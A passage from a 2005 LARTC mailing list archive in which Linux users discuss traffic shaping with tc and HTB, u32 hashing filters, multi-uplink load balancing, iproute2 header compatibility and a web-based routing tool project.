<41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> <41E45BF3.1040208@dsl.pipex.com> Message-ID: <20050111162110.36391739@dxpl.pdx.osdl.net> On Tue, 11 Jan 2005 23:06:27 +0000 Andy Furniss wrote: > Thomas Graf wrote: > > * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > > > >>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h > >>@@ -136,6 +143,7 @@ > >> __u32 limit; /* Maximal packets in queue */ > >> unsigned divisor; /* Hash divisor */ > >> unsigned flows; /* Maximal number of flows */ > >>+ unsigned hash_kind; /* Hash function to use for flow identification */ > >> }; > > > > > > This breaks compatibility to older iproute2 versions > > compiled with older header versions (not including > > the additional 4 octets). sch_sfq.c: > > > > if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > > return -EINVAL; > > I did wonder if it could just come out now that iproute2 uses its own > pkt_sched.h. > > Just to be sure I understand - it's a risk that always existed eg. > before Stephen maintained iproute2, when it compiled against kernel > headers. If I patched kernel and failed to compile new tc/had old tc > ahead in path etc. then sfq would be broken. > > So if you patch make sure you build and use new tc do tc -V / check you > don't have an old one in /sbin as iproute2's make install uses /usr/sbin > by default. > We need to maintain binary compatibility so that old command with latest kernel, and new command works with old kernel. That restricts message formats. But not source compatibility for iproute2, the iproute2 package needs to be self-contained and not depend on external (kernel) headers that may or may not be up to date. Also, older version of iproute2 compiled with current kernel headers should be supported. I would rather see all versions of iproute2 tarball's as self contained and not depend on kernel headers. From andy.furniss@dsl.pipex.com Wed Jan 12 01:08:42 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 12 Jan 2005 01:08:42 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <20050111162110.36391739@dxpl.pdx.osdl.net> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> <41E45BF3.1040208@dsl.pipex.com> <20050111162110.36391739@dxpl.pdx.osdl.net> Message-ID: <41E4789A.2060301@dsl.pipex.com> Stephen Hemminger wrote: > On Tue, 11 Jan 2005 23:06:27 +0000 > Andy Furniss wrote: > > >>Thomas Graf wrote: >> >>>* Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 >>> >>> >>>>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h >>>>@@ -136,6 +143,7 @@ >>>> __u32 limit; /* Maximal packets in queue */ >>>> unsigned divisor; /* Hash divisor */ >>>> unsigned flows; /* Maximal number of flows */ >>>>+ unsigned hash_kind; /* Hash function to use for flow identification */ >>>>}; >>> >>> >>>This breaks compatibility to older iproute2 versions >>>compiled with older header versions (not including >>>the additional 4 octets). sch_sfq.c: >>> >>> if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) >>> return -EINVAL; >> >>I did wonder if it could just come out now that iproute2 uses its own >>pkt_sched.h. >> >>Just to be sure I understand - it's a risk that always existed eg. >>before Stephen maintained iproute2, when it compiled against kernel >>headers. If I patched kernel and failed to compile new tc/had old tc >>ahead in path etc. then sfq would be broken. >> >>So if you patch make sure you build and use new tc do tc -V / check you >>don't have an old one in /sbin as iproute2's make install uses /usr/sbin >>by default. >> > > > We need to maintain binary compatibility so that old command with latest > kernel, and new command works with old kernel. That restricts message formats. > > But not source compatibility for iproute2, the iproute2 package needs to be self-contained > and not depend on external (kernel) headers that may or may not be up to date. > > Also, older version of iproute2 compiled with current kernel headers > should be supported. I would rather see all versions of iproute2 tarball's > as self contained and not depend on kernel headers. > Ahh - I think I see what you mean. If esfq wants to get into kernel then it has to become a completly new queue and not mess with sfq options at all. Andy. From justin@expertron.co.za Wed Jan 12 10:57:39 2005 From: justin@expertron.co.za (Justin Schoeman) Date: Wed, 12 Jan 2005 12:57:39 +0200 Subject: [LARTC] GeoIP? Message-ID: <41E502A3.1010405@expertron.co.za> Hi all, does anybody know what happened to GeoIP (www.geoip.net)? It seems I just get an empty page if I try go to the site now... Thanks, Justin From andy.furniss@dsl.pipex.com Wed Jan 12 11:10:49 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 12 Jan 2005 11:10:49 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <1483.192.168.1.2.1105403313@maild.mine.nu> References: <1483.192.168.1.2.1105403313@maild.mine.nu> Message-ID: <41E505B9.9060700@dsl.pipex.com> junk@maild.mine.nu wrote: > I am still looking for a solution to this problem....... > >>junk@maild.mine.nu wrote: >> >>>Hi, >>>Yes i did give this a try a couple of times before with no success >>> >>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK >>>--set-mark 0x2 >>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK >>>--set-mark 0x1 >>> >>> ip rule : >>>0: from all lookup local >>>201: from all fwmark 0x2 lookup 202 >>>201: from all fwmark 0x1 lookup 201 >>>32766: from all lookup main >>>ip route show table 202 >>>default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120 >>>ip route show table 201 >>>default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214 >>>ip route show table main >>>212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214 >>>212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120 >>>default proto static equalize >>> nexthop via 212.199.26.111 dev ppp0 weight 1 >>> nexthop via 212.199.28.244 dev ppp1 weight 1 >> >> >> >>I must admit I am more into tc than ip so I've never tried it. >> >>My guess is that you need to get rid of equalize/weights as these load >>balance per connection and the routes get cached. >> >>Andy. More things I would try - mark in postrouting, snat to the adress of downlink you want return to use. Get rid of the src adresses in in tables. Andy. From andy.furniss@dsl.pipex.com Wed Jan 12 11:36:32 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 12 Jan 2005 11:36:32 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <41E505B9.9060700@dsl.pipex.com> References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E505B9.9060700@dsl.pipex.com> Message-ID: <41E50BC0.7010705@dsl.pipex.com> Andy Furniss wrote: > mark in postrouting, Oops - I mean mark in forward aswell as output - do snat in postrouting nat table. Andy. From ashling.odriscoll@cit.ie Wed Jan 12 12:18:09 2005 From: ashling.odriscoll@cit.ie (Ashling O'Driscoll) Date: Wed, 12 Jan 2005 12:18:09 -0000 Subject: [LARTC] dynamic bandwidth allocation Message-ID: <380-2200513121218967@cit.ie> Hi, Hope someone can help me=2E I am a student who hass been given a project to develop a dynamic bandwidth service=2E I currently have a linux router which at the moment gives users static bandwidth and assigns each of them to a bucket=2E I have not gotten information yet as to whether each bucket is serviced in a round robin fashion or whether certain buckets get preferential treatment (i=2Ee=2E bucket 1 service 60% as opposed to bucket 2 40%)=2E I need to implement dynamic bandwidth/traffic shaping based on certain types of traffic/applications e=2Eg=2Evoice or based on particluar users=2E So basically if voice traffic is being delayed and not getting through,the bandwidth should be dynamically adjusted to accommodate this and then readjusted once the problem is resolved=2E I have researched the iproute 2 package,tc, packet priorities, tos bytes, queues etc the last few days but I am actually confused at this stage by all the information=2E I have also come across a scripting tool called "pacemaker" from st josephs university in america which seems "close" to what I want but not quite it=2E=20 If anyone could offer me advice on how I should approach this, whether it's "do-able" and an estimation of what kind of task Im undertaking i=2Ee=2E how difficult and how much time this might take, I would be VERY grateful=2E As I have not worked in industry before and am not very familiar with linux, I dont know how possible/difficult this project is or even how to approach it=2E Thanks in advance, Aisling=2E = -------------------Legal Disclaimer-------------------------------------= -- The above electronic mail transmission is confidential and intended only = for the person to whom it is addressed. Its contents may be protected by = legal and/or professional privilege. Should it be received by you in erro= r please contact the sender at the above quoted email address. Any unauth= orised form of reproduction of this message is strictly prohibited. The I= nstitute does not guarantee the security of any information electronicall= y transmitted and is not liable if the information contained in this comm= unication is not a proper and complete record of the message as transmitt= ed by the sender nor for any delay in its receipt.= From valton@ipko.net Wed Jan 12 12:27:18 2005 From: valton@ipko.net (Valton Hashani) Date: Wed, 12 Jan 2005 13:27:18 +0100 Subject: [LARTC] hashing filters Message-ID: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> This is a multi-part message in MIME format. ------=_NextPart_000_0556_01C4F8AA.70929580 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi all, I am a newbie and I have not played a lot with tc utility. I have red = maybe everything that has to do with massive filtering (maybe not = everything). If you can help me on this I would appriciate that very = much. I use tc utility with iproute2-ss040831.=20 I want to limit bandwidth for the 192.168.0.0/16 subnet using this = script. tc qdisc del dev eth0 root tc qdisc add dev eth0 root handle 1: htb tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil = 100MBit=20 tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256 tc filter add dev eth0 protocol ip parent 1: u32 match ip dst = 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2: tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil = 128Kbit j=3D0; while [ $j -le 254 ] do i=3D0; while [ $i -le 254 ] do hexi=3D`echo "obase=3D16; $i" | bc` tc filter add dev eth0 protocol ip parent 1:2 u32 ht = 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3 i=3D$((i+1)) done j=3D$((j+1)) done =20 somewhere at 192.168.8.7/32 it appears on the screen this message=20 RTNETLINK answers: File exists We have an error talking to the kernel Can you tell me please what am I doing wrong. Thank you in advance=20 Valton ------=_NextPart_000_0556_01C4F8AA.70929580 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi all,
I am a newbie and I have not played a = lot with tc=20 utility. I have red maybe everything that has to do = with massive=20 filtering (maybe not everything). If you can help me on this I = would appriciate that very much. I use tc utility with=20  iproute2-ss040831.
I want to limit bandwidth for  = the =20 192.168.0.0/16 subnet using this script.
 
 
tc qdisc del dev eth0 root
tc qdisc = add dev eth0=20 root handle 1: htb
tc class add dev eth0 parent 1: classid 1:2 = htb  rate=20 100Mbit ceil 100MBit
tc filter add dev eth0 parent 1:2 handle 2: = protocol ip=20 u32 divisor 256
tc filter add dev eth0 protocol ip parent 1: u32 = match ip dst=20 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2:
tc class add dev = eth0=20 parent 1:2 classid 1:3 htb  rate 128Kbit ceil 128Kbit
 
j=3D0;
 
while [ $j -le 254 ]
 
do
      =20 i=3D0;
 
        while [=20 $i -le 254 ]
       =20 do
           &= nbsp;   =20 hexi=3D`echo "obase=3D16; $i" |=20 bc`
           =     =20 tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip = dst=20 192.168.$j.$i flowid=20 1:3
           =     =20 i=3D$((i+1))
      done
 
j=3D$((j+1))
done
  
somewhere at 192.168.8.7/32 it appears = on the=20 screen this message
 
RTNETLINK answers: File exists
We = have an error=20 talking to the kernel
 
Can you tell me please what am I doing=20 wrong.
 
Thank you in advance
Valton
------=_NextPart_000_0556_01C4F8AA.70929580-- From tomasz.paszkowski@e-wro.pl Wed Jan 12 13:11:21 2005 From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski) Date: Wed, 12 Jan 2005 14:11:21 +0100 Subject: [LARTC] hashing filters In-Reply-To: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> Message-ID: <20050112131121.GA5641@krezus.e-wro.net> --FL5UXtIhxfXey3p5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 12, 2005 at 01:27:18PM +0100, Valton Hashani wrote: > Hi all, > I am a newbie and I have not played a lot with tc utility. I have red may= be everything that has to do with massive filtering (maybe not everything).= If you can help me on this I would appriciate that very much. I use tc uti= lity with iproute2-ss040831.=20 > I want to limit bandwidth for the 192.168.0.0/16 subnet using this scri= pt. >=20 >=20 > tc qdisc del dev eth0 root > tc qdisc add dev eth0 root handle 1: htb > tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBi= t=20 > tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256 > tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0= /16 hashkey mask 0x000000ff at 12 link 2: change to: tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/2= 4 hashkey mask 0x000000ff at 16 link 2: > tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kb= it >=20 > j=3D0; >=20 > while [ $j -le 254 ] >=20 > do > i=3D0; >=20 > while [ $i -le 254 ] > do > hexi=3D`echo "obase=3D16; $i" | bc` add hiere: echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match = ip dst 192.168.$j.$i flowid 1:3 and show us results. > tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$h= exi: match ip dst 192.168.$j.$i flowid 1:3 > i=3D$((i+1)) > done >=20 > j=3D$((j+1)) > done > =20 > somewhere at 192.168.8.7/32 it appears on the screen this message=20 >=20 > RTNETLINK answers: File exists > We have an error talking to the kernel >=20 > Can you tell me please what am I doing wrong. --=20 Tomasz Paszkowski --FL5UXtIhxfXey3p5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFB5SH5cNXOL98XeysRAvG+AJ0fC7TCUZn1Ro7jixbv0yqxjIhthACeM+Q+ 2b8OEvvcJ96CzuyW79kPqFA= =BQcC -----END PGP SIGNATURE----- --FL5UXtIhxfXey3p5-- From TechSupport@sqliaison.com Wed Jan 12 13:48:24 2005 From: TechSupport@sqliaison.com (TechSupport) Date: Wed, 12 Jan 2005 08:48:24 -0500 Subject: [LARTC] Good pratice with a Linux Gateway / Traffic Shapping Message-ID: Hi, I am the network administrator of my company, I know quite well Windows = networking and a few about Linux and its amazing routing and QOS = capabilities. Right now, we have a bustable T1, which mean that the bill increase with = out T1 use. I have decided to find a way to shape the traffic so I can stay at a = raisonable speed of 256 kb/s (Up/down) on my T1. I have linux gateway with 2 nics behind a PIX firewall. Right know, the gateway and the pix are configured in a way so I can = have a network segment inside my internal network. The Linux version is suse PRO 9.2 My questions are (yes, they are several questions) > what is the best method to use to shape the traffic on my linux = gateway ? I know that there is several possibilities, like wondershaper script , = htb.init script and even l7-filter but I still confused about the right = procedure that I have to use.=20 > most probably, I have to customize my script so it can reflect what I = want, I know also that I have to learn pretty much on those different = shaping methods, but is there some good books/ internet site where I can = find some usefull information about that ? I also looking for some = guides that could help me to begin the project. > also, is there a way to make the shaping different for particular ips = or protocols ? I know that I can mark some packets but still confused = how to make all the stuff work. The linux world is so huge that I am pretty lost ... so different = method, so many considerations, patches to apply, stuff like that. I = want to learn and master my network, and working hard is not a problem. = The problem is maybe when a newby starts to enter the linux world, it is = quite confusing ... Anyway, I am ready to work hard on this project and = I hope I can count on the linux community to give me a little help. I know that those questions are maybe already been asked by other people = in the same situation. So I will try to create a guide as the project = will evolve and make it available on the net for everybody.=20 I really need some advices here because I know that it is possible. Any help will be apreciated. Sorry for my english ... Romain Pelissier 9900 Cavendish Blvd., suite 200 St-Laurent, QC H4M 2V2 T 514.333.6600 /126 F 514.333.1080 Romain.Pelissier@sqliaison.com www.sqliaison.com From nug@sch.bme.hu Wed Jan 12 14:06:11 2005 From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Wed, 12 Jan 2005 15:06:11 +0100 Subject: [LARTC] Good pratice with a Linux Gateway / Traffic Shapping In-Reply-To: References: Message-ID: <41E52ED3.4010209@sch.bme.hu> Hi! I am not very experienced, but maybe i can help you. TechSupport wrote: > Hi, > I am the network administrator of my company, I know quite well Windows networking and a few about Linux and its amazing routing and QOS capabilities. > Right now, we have a bustable T1, which mean that the bill increase with out T1 use. > I have decided to find a way to shape the traffic so I can stay at a raisonable speed of 256 kb/s (Up/down) on my T1. > I have linux gateway with 2 nics behind a PIX firewall. > Right know, the gateway and the pix are configured in a way so I can have a network segment inside my internal network. > The Linux version is suse PRO 9.2 > My questions are (yes, they are several questions) > >>what is the best method to use to shape the traffic on my linux gateway ? I think you should use HTB method. http://luxik.cdi.cz/~devik/qos/htb/ Limit the incoming and/or outgoing bandwith, maybe make some subclasses to have garantied bandwith for web, mail, etc. You should attach an SFQ qdisc to the most popular classes. > I know that there is several possibilities, like wondershaper script , htb.init script and even l7-filter but I still confused about the right procedure that I have to use. > >>most probably, I have to customize my script so it can reflect what I want, I know also that I have to learn pretty much on those different shaping methods, but is there some good books/ internet site where I can find some usefull information about that ? I also looking for some guides that could help me to begin the project. >>also, is there a way to make the shaping different for particular ips or protocols ? I know that I can mark some packets but still confused how to make all the stuff work. > > The linux world is so huge that I am pretty lost ... so different method, so many considerations, patches to apply, stuff like that. I want to learn and master my network, and working hard is not a problem. The problem is maybe when a newby starts to enter the linux world, it is quite confusing ... Anyway, I am ready to work hard on this project and I hope I can count on the linux community to give me a little help. > I know that those questions are maybe already been asked by other people in the same situation. So I will try to create a guide as the project will evolve and make it available on the net for everybody. > I really need some advices here because I know that it is possible. > Any help will be apreciated. This site helped me a lot, to understand: http://www.knowplace.org/shaper/ I didn't use any prepared scripts but write my own using iptables and tc basic commands. If you are a network administrator i recommend this to you too, because this is the way to really understand what you do. -- Udv, Nandor Ps. Welcome to the linux community! From db@wless.gr Wed Jan 12 16:07:12 2005 From: db@wless.gr (Mpourtounis Dimitris) Date: Wed, 12 Jan 2005 18:07:12 +0200 Subject: [LARTC] Connection tracking flush Message-ID: <1105546032.5000.3.camel@WLESS> Hi all, Is there a way i can flush the connection tracking on my box (after a restart in iptables)? If the connection tracking module is unloaded and reloaded, my job will be accomplished i think. The bad thing is i want this tracking module to exist in kernel code and not loaded as a module. Regards, DB From brooke@dizzyg.net Wed Jan 12 17:21:00 2005 From: brooke@dizzyg.net (brooke) Date: Wed, 12 Jan 2005 11:21:00 -0600 Subject: [LARTC] 2 internet connections for 2 different purposes In-Reply-To: <000b01c4ee11$9ba62c30$200fa8c0@DELTA> References: <41D33636.20503@dizzyg.net> <000b01c4ee11$9ba62c30$200fa8c0@DELTA> Message-ID: <41E55C7C.9050707@dizzyg.net> Well, I found a FAQ on the site of shorewall.net site, the config files for the iptables setup I'm using. http://shorewall.net/FAQ.htm#faq32 but it's not what I want to do. So for nowI've got the incoming NAT working for the dmz network, if you come in eth4 on a proper address I route you to eth3 the dmz network and translate it to a 10.2 address. My problem seems to be the outgoing. I don't understand how I tell all machines who are on the 10.1.x.x network connected via eth0 to go out of the ISP connected via eth2. Also, I don't understand how I make machines on the 10.2.1.x network on eth3 to use the interenet connection via eth4. anyone care to get me going in the right direction? Thanks in advance Brooke Chris Bennett wrote: > When you say you are so close but can't get your head around the final > part... what do you mean? Exactly what is working and what is not? > How far have you gotten? > > ----- Original Message ----- From: "brooke" > To: > Sent: Wednesday, December 29, 2004 4:56 PM > Subject: [LARTC] 2 internet connections for 2 different purposes > > >> I've got a linux machine (fedora core 3) with 4 network cards. >> >> I looked at the howto and the only example that is close to what I >> need to do is section 4.2 on multiple uplink providers. I feel like >> I'm so close but just can't get my head around the final part. >> >> Here is what I have >> >> eth2 and eth4 connect to 2 different isps. >> I want all connections the come from my dmz on eth3 to go out of my >> connection on eth4 >> I want all connections from my local network on eth0 to go out of my >> connection on eth2 >> >> can anyone help me out with this? >> thanks in advance >> Brooke >> >> _______________________________________________ >> LARTC mailing list / LARTC@mailman.ds9a.nl >> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >> > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > From stef.coene@docum.org Wed Jan 12 17:44:46 2005 From: stef.coene@docum.org (Stef Coene) Date: Wed, 12 Jan 2005 18:44:46 +0100 Subject: [LARTC] Need help regarding TBF Token rate setting In-Reply-To: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com> References: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com> Message-ID: <200501121844.46855.stef.coene@docum.org> On Tuesday 11 January 2005 12:21, sanjeev ravindran wrote: > Hi, > > I would like to know how to specify the token rate when a tbf qdic is > created using tc tool.. Will it be a default value when tbf qdisc is > created? http://lartc.org/manpages/tc-tbf.html The token fill rate is rate / timer (Hz) Stef From Aaron Wolfe Wed Jan 12 17:59:07 2005 From: Aaron Wolfe (Aaron Wolfe) Date: Wed, 12 Jan 2005 12:59:07 -0500 Subject: [LARTC] Load balancing / Traffic shaping project looking for help Message-ID: Hi, I've managed to create a web based interface to some of the advanced routing capabilities in Linux. Currently it is functional (and pretty, i think :) although far from perfect. I'm looking for people with better programming skills and/or understandings of advanced routing concepts in Linux than I have who'd like to help out with the project. The overall goals are: #1 to make advanced routing and traffic shaping very easy for those just getting started #2 allow admins to easily backup or restore multiple versions of an entire linux router's configuration (fw, routing, traffic shaping, interface settings etc) via a single text file, much like a cisco router #3 make it all pretty enough that the nontechnical CIO types say "wow" and let us use linux routers in production more often. The current system is a collection of perl CGI scripts and a background process that keeps an eye on things. It supports high availability via the heartbeat project and uses Julian Anastasov's kernel patches to support load balanced routing with dead gateway detection. The background process can start a dialup connection if all other connections have failed. rrdtool is used to generate lots of pretty graphs locally, and the system supports snmp and zabbix remote monitoring. If you're interested (and especially if you'd like to help!) please check out the project page: http://sourceforge.net/projects/kdtrg/ thanks -Aaron From valton@ipko.net Wed Jan 12 18:08:03 2005 From: valton@ipko.net (Valton Hashani) Date: Wed, 12 Jan 2005 19:08:03 +0100 Subject: [LARTC] hashing filters References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net> Message-ID: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z> Hi, with a Tomasz suggestions I tried with the setup below but it appears at the same place, the same error. RTNETLINK answers: File exists We have an error talking to the kernel Is there any other way? Regards, Valton ------------------------- tc qdisc del dev eth0 root tc qdisc add dev eth0 root handle 1: htb tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256 #tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2: tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/24 hashkey mask 0x000000ff at 16 link 2: tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit j=0; while [ $j -le 254 ] do i=0; while [ $i -le 254 ] do hexi=`echo "obase=16; $i" | bc` echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3 tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3 i=$((i+1)) done j=$((j+1)) done ----- Original Message ----- From: "Tomasz Paszkowski" To: "Valton Hashani" Cc: Sent: Wednesday, January 12, 2005 2:11 PM Subject: Re: [LARTC] hashing filters On Wed, Jan 12, 2005 at 01:27:18PM +0100, Valton Hashani wrote: > Hi all, > I am a newbie and I have not played a lot with tc utility. I have red maybe everything that has to do with massive filtering (maybe not everything). If you can help me on this I would appriciate that very much. I use tc utility with iproute2-ss040831. > I want to limit bandwidth for the 192.168.0.0/16 subnet using this script. > > > tc qdisc del dev eth0 root > tc qdisc add dev eth0 root handle 1: htb > tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit > tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256 > tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2: change to: tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/24 hashkey mask 0x000000ff at 16 link 2: > tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit > > j=0; > > while [ $j -le 254 ] > > do > i=0; > > while [ $i -le 254 ] > do > hexi=`echo "obase=16; $i" | bc` add hiere: echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3 and show us results. > tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3 > i=$((i+1)) > done > > j=$((j+1)) > done > > somewhere at 192.168.8.7/32 it appears on the screen this message > > RTNETLINK answers: File exists > We have an error talking to the kernel > > Can you tell me please what am I doing wrong. -- Tomasz Paszkowski From shemminger@osdl.org Wed Jan 12 20:30:39 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Wed, 12 Jan 2005 12:30:39 -0800 Subject: [LARTC] Test version of iproute2 Message-ID: <20050112123039.7b02f2f6@dxpl.pdx.osdl.net> There is an new version of iproute2 for testing. http://developer.osdl.org/dev/iproute2/download/iproute2-2.6.10-ss050112.tar.gz Mostly simple merges, but could have some issues. Jamal did I get everything you sent? [Masahide Nakamura] ipmonitor shows IPv6 prefix list notification update to iproute2 xfrm for ipv6 [Stephen Hemminger] fix compile warnings when building 64bit system don't include warning about "ip route nat" no longer supported [Catalin(ux aka Dino) BOIE] fwmark in u32 filters [Andi Kleen] netlink manual page [Thomas Graf] tc testsuite [Jamal Hadi Salim] iptables tc support mirror and redirect actions -- Stephen Hemminger From aperlu@telefonica.net Wed Jan 12 21:15:00 2005 From: aperlu@telefonica.net (=?ISO-8859-1?Q?Antonio_P=E9rez?=) Date: Wed, 12 Jan 2005 22:15:00 +0100 Subject: [LARTC] load balancing Message-ID: <41E59354.5060908@telefonica.net> Hi everyone. I have two ADSL connection with the same ISP, ppp0 => 83.32.32.36 <=> 192.168.153.1 ppp1 => 83.32.45.33 <=> 192.168.153.1 and I want to do load balancing wiht the two connections, so I do: #ip route add default scope global nexthop via 192.153..1.1 dev 83.32.32.36 weight 1 nexthop via 192.168.153.1 dev 83.32.45.33 weight 1 #ip route show 192.153.1.1 dev ppp0 proto kernel scope link src 83.32.32.36 192.153.1.1 dev ppp1 proto kernel scope link src 83.32.45.33 default nexthop via 192.168.153.1 dev ppp0 weight 1 nexthop via 192.168.153.1 dev ppp1 weight 1 But this do not work, when I try do ping www.google.es this do not work and I get the mesage "MASQUERADE: Route sent us somewhere else" I am using the 2.6.8 kernel. Anybody can help me? please. Thanks you. From micah milano Thu Jan 13 00:41:41 2005 From: micah milano (micah milano) Date: Wed, 12 Jan 2005 18:41:41 -0600 Subject: [LARTC] Load balancing / Traffic shaping project looking for help In-Reply-To: References: Message-ID: <70fda320501121641542cd8a9@mail.gmail.com> This looks really nice! I really would like to try it out, but there is no code on the sourceforge site released yet. Unfortunately I am not the person you are looking for as my understanding of the advanced routing concepts is not that good yet, thats why I am interested in your tool :) How much of this actually works? micah On Wed, 12 Jan 2005 12:59:07 -0500, Aaron Wolfe wrote: > Hi, > > I've managed to create a web based interface to some of the advanced > routing capabilities in Linux. Currently it is functional (and > pretty, i think :) although far from perfect. I'm looking for people > with better programming skills and/or understandings of advanced > routing concepts in Linux than I have who'd like to help out with the > project. > > The overall goals are: > #1 to make advanced routing and traffic shaping very easy for those > just getting started > #2 allow admins to easily backup or restore multiple versions of an > entire linux router's configuration (fw, routing, traffic shaping, > interface settings etc) via a single text file, much like a cisco > router > #3 make it all pretty enough that the nontechnical CIO types say "wow" > and let us use linux routers in production more often. > > The current system is a collection of perl CGI scripts and a > background process that keeps an eye on things. It supports high > availability via the heartbeat project and uses Julian Anastasov's > kernel patches to support load balanced routing with dead gateway > detection. The background process can start a dialup connection if > all other connections have failed. > rrdtool is used to generate lots of pretty graphs locally, and the > system supports snmp and zabbix remote monitoring. > > If you're interested (and especially if you'd like to help!) please > check out the project page: > > http://sourceforge.net/projects/kdtrg/ > > thanks > -Aaron > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From andy.furniss@dsl.pipex.com Thu Jan 13 03:21:00 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 13 Jan 2005 03:21:00 +0000 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. In-Reply-To: <1483.192.168.1.2.1105403313@maild.mine.nu> References: <1483.192.168.1.2.1105403313@maild.mine.nu> Message-ID: <41E5E91C.6050606@dsl.pipex.com> junk@maild.mine.nu wrote: > I am still looking for a solution to this problem....... > >>junk@maild.mine.nu wrote: >> >>>Hi, >>>Yes i did give this a try a couple of times before with no success >>> >>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK >>>--set-mark 0x2 >>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK >>>--set-mark 0x1 Had a go at this on 2.6.9 / iptables 1.2.11 and it seeems nth is broken. I'll try again tomorrow. Andy. From sanjeev_ravindran@linuxmail.org Thu Jan 13 05:37:22 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Thu, 13 Jan 2005 13:37:22 +0800 Subject: [LARTC] Need help regarding TBF Token rate setting Message-ID: <20050113053722.8D7F92B2B86@ws5-7.us4.outblaze.com> Thank you so much for ur response Stef, I have one more doubt that I would like to clear... If I set the rate in kb= ps at which i want my data to 